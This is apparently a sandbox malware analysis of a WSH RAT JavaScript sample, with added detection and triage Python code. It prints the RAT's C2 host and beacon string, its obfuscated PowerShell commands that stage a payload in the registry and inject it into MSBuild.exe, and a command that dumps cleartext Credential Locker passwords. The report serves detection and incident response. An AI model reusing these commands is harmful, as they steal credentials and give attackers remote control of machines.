Analysis

max time kernel: 151s
max time network: 181s
platform: windows7_x64
resource: win7v20210408
submitted: 14/10/2021, 10:12

Static task: static1
Behavioral task: behavioral1
Sample: ID-92164.js
Resource: win7v20210408

General

Target: ID-92164.js
Size: 1.0MB
MD5: 2e49ab9cb1bcc2aef854c4ea0f4172b9
SHA1: 9762fe64cdda7ca49f4247d8dd7497e8f6ef295e
SHA256: f9490f2e724d5ca5edd30a552f09f27b59b608361143e95edcc3ef860958ea5e
SHA512: 3dfbbf4b7d3bd3091a3694319e9524baaf05b6db6c212fa73cbaf2df488a4aa104c057839434e7b766b8e2f603b94279d87f5139851516561397dd463c8f458f
Malware Config

Extracted
Family: wshrat
C2: http://3laallah.myvnc.com:5555
Signatures

Blocklisted process makes network request (17 IoCs)
flow                                                             pid   Process
6, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24  1208  wscript.exe
Executes dropped EXE (3 IoCs)
pid   Process
1708  python.exe
1548  cmdc.exe
1760  cmdc.exe

Loads dropped DLL (21 IoCs)
pid   Process     events
1708  python.exe  21 (all 21 DLL loads come from this one process)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses Microsoft Outlook accounts (1 TTPs, 1 IoCs)
description  ioc                                                                                                                             Process
Key opened   \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts  cmdc.exe
(The opening process is the dropped cmdc.exe, run with /stext to write its output to a file; see the process tree.)

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
5     ip-api.com

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). The sandbox's canned description for this signature adds "likely ransomware behaviour", but nothing else in this report points that way: the sample beacons as a RAT and dumps credentials, and no file encryption is recorded. Read this as drive enumeration, not as evidence of ransomware.
Kills process with taskkill (3 IoCs)
pid   Process
1092  taskkill.exe
1788  taskkill.exe
1120  taskkill.exe

Runs .reg file with regedit (1 IoCs)
pid   Process
1176  regedit.exe
Script User-Agent (15 IoCs)
Uses user-agent string associated with script host/environment.
description             flows                                                         ioc
HTTP User-Agent header  8, 9, 10, 11, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24  WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands
All 15 flows carry the same beacon string; it is the pipe-delimited host profile (family tag, id, computer name, user, OS, AV, date, script build, country) that the script sends on every request. Flows 6 and 13 appear in the network-request list above but carry no WSHRAT User-Agent.
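The User-Agent above is the most durable network indicator in this report: the same pipe-delimited profile is sent on every flow, so a proxy-log hunt can key on its shape rather than on the C2 host. The parser below is an added example for this page, not part of the sandbox output; the log lines are constructed (the first User-Agent and the C2 host are the ones observed here, the rest are invented controls), and the per-field names are an assumption, since the report shows only the raw string.

```python
"""Flag WSH RAT beacons in HTTP proxy logs by their pipe-delimited User-Agent.

Added example for this report, not part of the sandbox output. The beacon
layout is taken from the User-Agent observed above; the per-field names are an
assumption (the sandbox shows only the raw string).
"""
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlsplit

# Constructed proxy log lines: <ts> <client> <method> <url> "<user-agent>".
# Line 1 uses the User-Agent and C2 host from this analysis; the other lines
# are invented controls and variants, not observed traffic.
SAMPLE_LOG = """\
2021-10-14T10:12:31Z 10.0.0.7 POST http://3laallah.myvnc.com:5555/ "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands"
2021-10-14T10:12:35Z 10.0.0.7 GET http://ip-api.com/json "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
2021-10-14T10:13:02Z 10.0.0.9 POST http://c2.example.invalid:5555/ "WSHRAT|1A2B3C4D|WS-FIN-02|jdoe|Microsoft Windows 10 Pro|plus|Windows Defender|true - 01/10/2021|JavaScript-v3.4|US:United States"
2021-10-14T10:13:10Z 10.0.0.3 GET https://www.microsoft.com/ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
2021-10-14T10:13:12Z 10.0.0.4 GET http://c2.example.invalid:5555/ "WSHRAT|broken|only|four"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "(.*)"$')
BEACON_FIELDS = 10  # "WSHRAT" plus nine data fields in the observed string


@dataclass
class Beacon:
    bot_id: str        # assumed meaning: per-host id ("40707513")
    hostname: str      # "QWOCTUPM"
    username: str      # "Admin"
    os_name: str       # "Microsoft Windows 7 Ultimate" (trailing space stripped)
    tag: str           # "plus"; meaning not shown by the report
    av: str            # "nan-av"
    flag: str          # "false"/"true"; meaning not shown by the report
    date: str          # "14/10/2021"
    build: str         # "JavaScript-v3.4"
    country_code: str  # "NL"
    country: str       # "Netherlands"


def parse_beacon(ua: str) -> Optional[Beacon]:
    """Return a Beacon if `ua` has the WSHRAT|...|... layout, else None."""
    parts = ua.split("|")
    if parts[0] != "WSHRAT" or len(parts) != BEACON_FIELDS:
        return None
    # Field 7 is "<flag> - <dd/mm/yyyy>"; tolerate a missing date rather than drop the hit.
    flag, _, date = parts[7].partition(" - ")
    code, _, country = parts[9].partition(":")
    return Beacon(
        bot_id=parts[1], hostname=parts[2], username=parts[3],
        os_name=parts[4].strip(), tag=parts[5], av=parts[6],
        flag=flag.strip(), date=date.strip(), build=parts[8],
        country_code=code, country=country,
    )


@dataclass
class Hit:
    client: str
    c2: str            # host[:port] taken from the request URL
    beacon: Beacon


def scan_log(text: str) -> List[Hit]:
    """Run parse_beacon over every line; lines that do not parse are skipped, not fatal."""
    hits: List[Hit] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, url, ua = m.group(2), m.group(4), m.group(5)
        beacon = parse_beacon(ua)
        if beacon is not None:
            hits.append(Hit(client=client, c2=urlsplit(url).netloc, beacon=beacon))
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        b = h.beacon
        print(f"{h.client} -> {h.c2}: host={b.hostname} user={b.username} "
              f"os={b.os_name!r} av={b.av} build={b.build} country={b.country_code}")
```

Matching on the field layout rather than the literal string means a rebuilt beacon (new id, new host name, a different C2) still triggers, while the malformed fifth line shows the parser rejecting a near miss instead of raising. The hostname, user and AV fields are what an incident responder wants first: they tell you which machine is talking before you have touched the host.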
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
pid   Process
1708  python.exe

Suspicious behavior: EnumeratesProcesses (18 IoCs)
pid   Process         events
1640  powershell.exe  2
856   powershell.exe  2
1680  powershell.exe  12
988   powershell.exe  2

Suspicious use of AdjustPrivilegeToken (8 IoCs)
description              pid   Process
Token: SeDebugPrivilege  1640  powershell.exe
Token: SeDebugPrivilege  856   powershell.exe
Token: SeDebugPrivilege  1680  powershell.exe
Token: SeDebugPrivilege  988   powershell.exe
Token: 35                1708  python.exe
Token: SeDebugPrivilege  1092  taskkill.exe
Token: SeDebugPrivilege  1788  taskkill.exe
Token: SeDebugPrivilege  1120  taskkill.exe

Suspicious use of WriteProcessMemory (64 IoCs)
Identical rows collapsed; "events" is how many times the row appeared. procid_target is the sandbox's internal index for the target process.
description                     pid   Process         procid_target  events
PID 1208 wrote to memory of 1176  1208  wscript.exe     25             3
PID 1208 wrote to memory of 1640  1208  wscript.exe     31             3
PID 1208 wrote to memory of 856   1208  wscript.exe     33             3
PID 1208 wrote to memory of 1680  1208  wscript.exe     35             3
PID 1680 wrote to memory of 1516  1680  powershell.exe  37             4
PID 1680 wrote to memory of 1320  1680  powershell.exe  38             4
PID 1680 wrote to memory of 1920  1680  powershell.exe  39             4
PID 1680 wrote to memory of 1464  1680  powershell.exe  40             4
PID 1680 wrote to memory of 1016  1680  powershell.exe  41             4
PID 1208 wrote to memory of 988   1208  wscript.exe     42             3
PID 1208 wrote to memory of 1072  1208  wscript.exe     44             3
PID 1072 wrote to memory of 1708  1072  cmd.exe         46             4
PID 1208 wrote to memory of 1696  1208  wscript.exe     47             3
PID 1696 wrote to memory of 1092  1696  cmd.exe         49             3
PID 1208 wrote to memory of 1484  1208  wscript.exe     51             3
PID 1484 wrote to memory of 1788  1484  cmd.exe         53             3
PID 1208 wrote to memory of 1548  1208  wscript.exe     54             4
PID 1208 wrote to memory of 596   1208  wscript.exe     55             3
PID 596 wrote to memory of 1120   596   cmd.exe         57             3
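The parent/child pairs above are the whole attack chain in one table: the script host spawns PowerShell stages that read their payload from HKCU, one of those stages spawns MSBuild.exe and writes into it, and cmd.exe fans out taskkill and a dropped tool. The rule set below turns those pairs into process-creation detections. It is an added example, not sandbox output: EVENTS is constructed by hand from the PIDs, images and command lines in this report (shortened where noted), with an assumed parent for wscript.exe and two invented benign rows as controls.

```python
"""Rule-based detection of the process chain shown in this report.

Added example, not sandbox output. EVENTS mirrors the parent/child pairs and
command lines from the report in Sysmon Event ID 1-style fields (short keys);
the parent of wscript.exe and the two control rows are assumptions.
"""
import ntpath
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSCRIPT = r"C:\Windows\system32\wscript.exe"
MSBUILD = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
TEMP = r"C:\Users\Admin\AppData\Local\Temp"

EVENTS: List[Event] = [
    # parent of the script host is not shown in the report; explorer.exe is assumed
    {"pid": "1208", "image": WSCRIPT, "parent": r"C:\Windows\explorer.exe",
     "cmd": "wscript.exe " + TEMP + r"\ID-92164.js"},
    # registry-resident stage; command line shortened after the value read
    {"pid": "1640", "image": PS, "parent": WSCRIPT,
     "cmd": r'''powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test; <rest omitted>"'''},
    {"pid": "1680", "image": PS, "parent": WSCRIPT,
     "cmd": r'''powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC; <rest omitted>"'''},
    # MSBuild.exe as seen in the tree: no project file, C2 host/port and beacon instead
    {"pid": "1516", "image": MSBUILD, "parent": PS,
     "cmd": r'''path 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 1'''},
    {"pid": "988", "image": PS, "parent": WSCRIPT,
     "cmd": r'''powershell.exe -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"'''},
    {"pid": "1548", "image": TEMP + r"\cmdc.exe", "parent": WSCRIPT,
     "cmd": '"' + TEMP + r'\cmdc.exe" /stext ' + TEMP + r"\cmdc.exedata"},
    {"pid": "1092", "image": r"C:\Windows\system32\taskkill.exe", "parent": r"C:\Windows\system32\cmd.exe",
     "cmd": "taskkill /F /IM cmdc.exe"},
    # invented controls: a real build and an interactive one-liner
    {"pid": "4242", "image": MSBUILD, "parent": PS,
     "cmd": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},
    {"pid": "4243", "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell.exe -NoProfile -Command Get-Date"},
]


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def script_host_to_registry_powershell(e: Event) -> bool:
    """wscript/cscript spawning PowerShell that bypasses policy and reads HKCU."""
    c = e["cmd"].lower()
    return (_name(e["parent"]) in {"wscript.exe", "cscript.exe"}
            and _name(e["image"]) == "powershell.exe"
            and re.search(r"-executionpolicy\s+bypass", c) is not None
            and "hkcu:" in c)


def msbuild_without_project(e: Event) -> bool:
    """PowerShell launching MSBuild.exe with no project or solution on the command line."""
    return (_name(e["image"]) == "msbuild.exe"
            and _name(e["parent"]) == "powershell.exe"
            and re.search(r"\.(?:proj|csproj|vbproj|sln|targets)\b", e["cmd"], re.I) is None)


def password_vault_dump(e: Event) -> bool:
    """PasswordVault enumeration that also calls RetrievePassword (cleartext)."""
    c = e["cmd"].lower()
    return _name(e["image"]) == "powershell.exe" and "passwordvault" in c and "retrievepassword" in c


def temp_binary_stext(e: Event) -> bool:
    """A binary run from the user's Temp directory with the /stext switch seen on cmdc.exe."""
    return "\\appdata\\local\\temp\\" in e["image"].lower() and "/stext" in e["cmd"].lower()


def taskkill_force_by_name(e: Event) -> bool:
    """Low fidelity alone; the report shows it three times against the dropped cmdc.exe."""
    return _name(e["image"]) == "taskkill.exe" and re.search(r"/f\b.*/im\s+\S+", e["cmd"], re.I) is not None


RULES: Dict[str, Callable[[Event], bool]] = {
    "script_host_to_registry_powershell": script_host_to_registry_powershell,
    "msbuild_without_project": msbuild_without_project,
    "password_vault_dump": password_vault_dump,
    "temp_binary_stext": temp_binary_stext,
    "taskkill_force_by_name": taskkill_force_by_name,
}


def detect(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule name, pid) for every event that fires a rule."""
    return [(name, e["pid"]) for e in events for name, rule in RULES.items() if rule(e)]


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}")
```

The MSBuild rule is the one worth tuning: MSBuild.exe with no project argument is legitimate from a developer shell, so the rule requires a PowerShell parent and a command line that names no build file, which is exactly what the five MSBuild children of PID 1680 look like here. The PasswordVault and /stext rules are credential-theft behaviour and should page on their own; taskkill is kept only as corroboration.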
Processes

Depth in the tree is given in brackets; each entry lists the image, the PID, the command line as recorded, and the signatures the sandbox attached to that process.

[1] C:\Windows\system32\wscript.exe (PID 1208)
    command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\ID-92164.js
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\regedit.exe (PID 1176)
        command line: "regedit.exe" "C:\Users\Admin\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg"
        - Runs .reg file with regedit
        The .reg import precedes the PowerShell stages below, which read values under HKCU\SOFTWARE\Microsoft; the report does not show the file's contents.

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1640)
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        This stage reads HKCU\SOFTWARE\Microsoft\test as base64, gunzips it and writes the decompressed bytes back into the same value as base64. The payload is staged entirely in the registry; no file is written.

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 856)
        command line: identical to PID 1640 (second run of the same decompress-and-rewrite stage)
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1680)
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'3laallah.myvnc.com 5555 \"WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands\" 1'));"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        The mRunPE value is loaded in-memory with Assembly.Load and its k.k.Hackitup.exe method is handed the host name 'MSBuild.exe', the mPluginC bytes and an argument string made of the C2 host, port and beacon. The five MSBuild.exe children below carry exactly that argument string as their command line (after the literal token "path"), and the WriteProcessMemory table shows PID 1680 writing into each of them four times: a RunPE-style injection of mPluginC into a signed Microsoft host. None of the MSBuild instances was tagged with a signature of its own.

        [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (PIDs 1516, 1320, 1920, 1464, 1016; five instances with the same command line)
            command line: path 3laallah.myvnc.com 5555 "WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 14/10/2021|JavaScript-v3.4|NL:Netherlands" 1

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 988)
        command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        Enumerates every entry in the Credential Locker (PasswordVault) and calls RetrievePassword on each, so tmp.txt receives cleartext passwords. The type is a Windows Runtime API available from Windows 8 onward; on this Windows 7 resource the command cannot load it, so the detonation records the intent rather than the result.

    [2] C:\Windows\system32\cmd.exe (PID 1072)
        command line: "C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Local\Temp\wshsdk" && C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll > "C:\Users\Admin\AppData\Local\Temp\wshout"
        - Suspicious use of WriteProcessMemory

        [3] C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe (PID 1708)
            command line: C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious behavior: CmdExeWriteProcessMemorySpam
            - Suspicious use of AdjustPrivilegeToken
            A dropped Python runtime (wshsdk, 21 DLL loads) runs a script named rundll (no extension) and its output is captured in wshout. "rundll" here is a file name in Temp, not rundll32.exe.

    [2] C:\Windows\system32\cmd.exe (PID 1696)
        command line: "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\taskkill.exe (PID 1092)
            command line: taskkill /F /IM cmdc.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken

    [2] C:\Windows\system32\cmd.exe (PID 1484)
        command line: "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\taskkill.exe (PID 1788)
            command line: taskkill /F /IM cmdc.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken

    [2] C:\Users\Admin\AppData\Local\Temp\cmdc.exe (PID 1548)
        command line: "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
        - Executes dropped EXE

    [2] C:\Windows\system32\cmd.exe (PID 596)
        command line: "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\taskkill.exe (PID 1120)
            command line: taskkill /F /IM cmdc.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken

    [2] C:\Users\Admin\AppData\Local\Temp\cmdc.exe (PID 1760)
        command line: "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
        - Executes dropped EXE
        - Accesses Microsoft Outlook accounts
        The dropped tool is run twice with /stext (write results as text to cmdc.exedata), each run bracketed by a forced taskkill of any earlier instance; the second run is the one that opened the Outlook OMI Account Manager\Accounts key listed under Signatures.

    [2] C:\Windows\system32\cmd.exe (PID 1436)
        command line: "C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"
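The two decompress-and-rewrite stages (PIDs 1640 and 856) and the loader stage (PID 1680) mean the interesting bytes of this sample live in HKCU\SOFTWARE\Microsoft as base64 strings, some of them gzipped. When triaging a hive export you want to turn those strings back into bytes and know what you are looking at before deciding what to do with them. The helper below is an added example for this page, not sandbox output or the sample's own code; SAMPLE_VALUE is constructed in code (a minimal fake MZ/PE header, gzipped and base64-encoded) and is not a value taken from the sample.

```python
"""Recover a payload staged in the registry the way this report's PowerShell does.

Added example, not sandbox output. The stager reads a value as base64, gunzips
it and writes the result back as base64; a later stage loads 'mRunPE' as a .NET
assembly and hands it the 'mPluginC' bytes. Given those strings from a hive
export, decode_stage() returns the bytes and classify() says what they look
like. SAMPLE_VALUE is a constructed fake image, not data from the sample.
"""
import base64
import gzip
import hashlib
from typing import Dict

GZIP_MAGIC = b"\x1f\x8b"


def decode_stage(value: str) -> bytes:
    """Base64-decode a registry string and gunzip it if it is still compressed.

    The PowerShell loop assumes gzip; accepting both forms means the same call
    works on the value before and after the stager has rewritten it.
    """
    raw = base64.b64decode(value, validate=True)
    if raw.startswith(GZIP_MAGIC):
        raw = gzip.decompress(raw)
    return raw


def restage(value: str) -> str:
    """What the stager writes back into the value: base64 of the decompressed bytes."""
    return base64.b64encode(decode_stage(value)).decode("ascii")


def classify(blob: bytes) -> str:
    """'pe' when the MZ header and the PE signature at e_lfanew line up,
    'mz' for a bare DOS header, 'other' for anything else."""
    if not blob.startswith(b"MZ"):
        return "other"
    if len(blob) >= 0x40:
        e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
        if blob[e_lfanew:e_lfanew + 4] == b"PE\0\0":
            return "pe"
    return "mz"


def summarize(value: str) -> Dict[str, object]:
    """Triage record for one registry value: kind, size and SHA-256 of the decoded bytes."""
    blob = decode_stage(value)
    return {"kind": classify(blob), "size": len(blob),
            "sha256": hashlib.sha256(blob).hexdigest()}


def build_constructed_value() -> str:
    """Constructed fake image: 'MZ', padding, e_lfanew = 0x40, 'PE\\0\\0', padding.
    It is not executable code; it only exercises the decoder and classifier."""
    image = b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\0\0" + b"\0" * 24
    return base64.b64encode(gzip.compress(image)).decode("ascii")


SAMPLE_VALUE = build_constructed_value()

if __name__ == "__main__":
    print(summarize(SAMPLE_VALUE))            # gzipped form, as first staged
    print(summarize(restage(SAMPLE_VALUE)))   # rewritten form, same bytes underneath
```

Run against the real values, the SHA-256 of the decoded mRunPE and mPluginC blobs is the indicator to pivot on, since the base64 text in the registry changes every time the stager rewrites it while the bytes underneath do not. Note that the PowerShell on the page would throw on a value that is no longer gzipped; the decoder here tolerates both states so the same tooling works before and after the rewrite.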